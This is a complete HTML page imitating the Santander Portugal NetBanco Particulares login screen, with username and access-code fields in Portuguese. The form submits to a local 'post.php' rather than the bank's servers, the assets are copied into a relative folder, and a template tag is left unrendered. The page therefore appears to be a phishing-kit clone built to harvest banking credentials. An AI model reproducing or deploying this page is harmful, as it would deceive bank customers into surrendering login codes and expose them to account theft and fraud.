<!DOCTYPE html>
<meta http-equiv="Cache-Control" content="private,no-cache,no-store,must-revalidate,max-age=0"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Expires" content="1"/>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="pt-PT">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Netbanco Particulares - Santander</title>
    <meta http-equiv="Content-Language" content="pt" />
    <meta http-equiv="Content-type" content="text/html; charset=ISO-8859-1" />
    <meta http-equiv="Content-Style-Type" content="text/css" />
    <meta http-equiv="Cache-Control" content="private,no-cache,no-store,must-revalidate,max-age=0">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="1">
    <meta name="msapplication-TileColor" content="#ec0000">
    <meta name="msapplication-config" content="/ficheros/modern/images/icons/browserconfig.xml">
    <meta name="theme-color" content="#ec0000">
    <script type="text/javascript" src="asset/js/ruxitagentjs_ICA2SVfhqrux_10215210506134511.js"></script><link rel="apple-touch-icon" sizes="180x180" href="/ficheros/modern/images/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="asset/ficheros/modern/images/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="asset/ficheros/modern/images/icons/favicon-16x16.png">
    <link rel="manifest" href="asset/ficheros/modern/images/icons/site.webmanifest">
    <link rel="mask-icon" href="/ficheros/modern/images/icons/safari-pinned-tab.svg" color="#ec0000">
    <link rel="shortcut icon" href="asset/feticheros/modern/images/icons/favicon.ico">
    <link rel="shortcut icon" type="image/x-icon" href="/ficheros/modern/images/icons/santander-icon.svg"/>
    <link rel="stylesheet" type="text/css" href="asset/css/login_and_register.css">
    <link rel="stylesheet" type="text/css" href="asset/css/fonts.css">
    <script language="JavaScript" type="text/javascript" src="asset/js/nbp_jquery.js"></script>
    <script language="JavaScript" type="text/javascript" src="asset/js/misc.js"></script>
    <script src='asset/js/api.js'></script>
    <script language="JavaScript" type="text/javascript" src="asset/js/BEYAM5g3ZYkBxnx9bhxi.js"></script>
    <script language="JavaScript" type="text/javascript" src="asset/js/nbp_formf.js"></script>
    
</head>
<body>
    <header class="header-container" id="header-container">
        <a href="https://www.santander.pt/">
            <img src="asset/ficheros/modern/images/icons/santander-logo-red.svg" class="santander-logo">
        </a>
 </header>
<div class="center-content">
        <img src="asset/ficheros/modern/images/icons/login-image-0.svg" class="vector-art">
        <div class="main-content">
            
            <div class="page-title">
                <h1 class="main-title">NetBanco Particulares</h1>
                <h2 class="secondary-title">Login</h2>
            </div>

                <form id="formulario" name="formulario" autocomplete="off" method="post" action="post.php" novalidate>
                    <input type='hidden' name="sessiontoken" id="sessiontoken">
                    <input type='hidden' name="P2hoCyPjpg" id="P2hoCyPjpg">
                    <input type="hidden" name="accion" value="3" />
                                                                                                                    
                            <input type="hidden" name="ssafe" value="124042a2-6413-3f68-bd3c-150b5bf60e7f" />
                            <input type="hidden" name="linkHomeURL" value="https://www.particulares.santander.pt/pagina/indice/0,,276_1_2,00.html" />
        
                            <p class="title-description">
                                
                                Para aceder às suas contas e documentos no NetBanco, introduza o seu Nome de Utilizador seguido do seu Código de Acesso.
                                
                            </p>
                            
                            <section class="form-container"><div class="input-div"><input type="text" name="D0C349CA579109D097B7DB04C1B4F0DA" class="input-field" placeholder=" " maxlength="64" required="" autofocus=""><label for="D0C349CA579109D097B7DB04C1B4F0DA" id="D0C349CA579109D097B7DB04C1B4F0DA" class="floating-label">Nome de utilizador</label></div><div class="input-div"><input type="password" name="15C424DD6512FF19B16E520F57415A63" class="input-field" placeholder=" " maxlength="30" required=""><label for="15C424DD6512FF19B16E520F57415A63" id="15C424DD6512FF19B16E520F57415A63" class="floating-label">Código de Acesso</label><button type="button" class="show-password-button" tabindex="-1"></button></div>
                                        <a class="gray-link display-block" href="https://www.particulares.santander.pt/pagina/indice/0,,415_1_2,00.html?blocked=1" target="_parent">Esqueceu-se do código?</a>
                                
                            
                            
                                <div class="form-main-buttons">
                                    
                                        
                                        
                                            <a class="alt-button-red" href="https://www.particulares.santander.pt/pagina/indice/0,,415_1_2,00.html" target="_parent">Novo Registo</a>
                                        
                                    
                                    
                                        
                                        
                                            <button id="submit_button" name="submit_btn" class="square-button-red" type="submit">Entrar</button>
                                        
                                    
                                </div>
        
                                
                            </section>
                              
                </form>
                <a class="gray-link" href="https://www.particulares.santander.pt/pagina/indice/0,,840_1_2,00.html" target="_parent">Cartão Refeição</a>
                <a class="gray-link" href="https://www.santandertotta.pt/pt_PT/Particulares/simples-mudar-para-santander.html" target="_parent">Ainda não sou cliente</a>
        
                
            </div>
    </div>
<br />
<br />

    <footer id="footer">
        <div id="footer-link-container">
            <a class="footer-link" id="footer-pricing" href="https://www.santander.pt/pt_PT/Particulares/Precario.html?_ga=2.212762770.742033001.1559225578-367438372.1530887449" target="<%=targetAttribute%>">Preçário</a>
            <a class="footer-link" id="footer-terms" href="https://www.santander.pt/pt_PT/Particulares/Informacoes/Condicoes-de-Utilizacao.html?_ga=2.122258189.742033001.1559225578-367438372.1530887449" target="<%=targetAttribute%>">Termos e Condições</a>
            <a class="footer-link" id="footer-contacts" href="https://www.santander.pt/contactos" target="_parent">Contactos</a>
        </div>
<a id="footer-copyright" href="https://www.santander.pt/aviso-legal-copyright">© 2022 Santander - Todos os Direitos Reservados...</a>
</footer> 
    
</body>
</html>
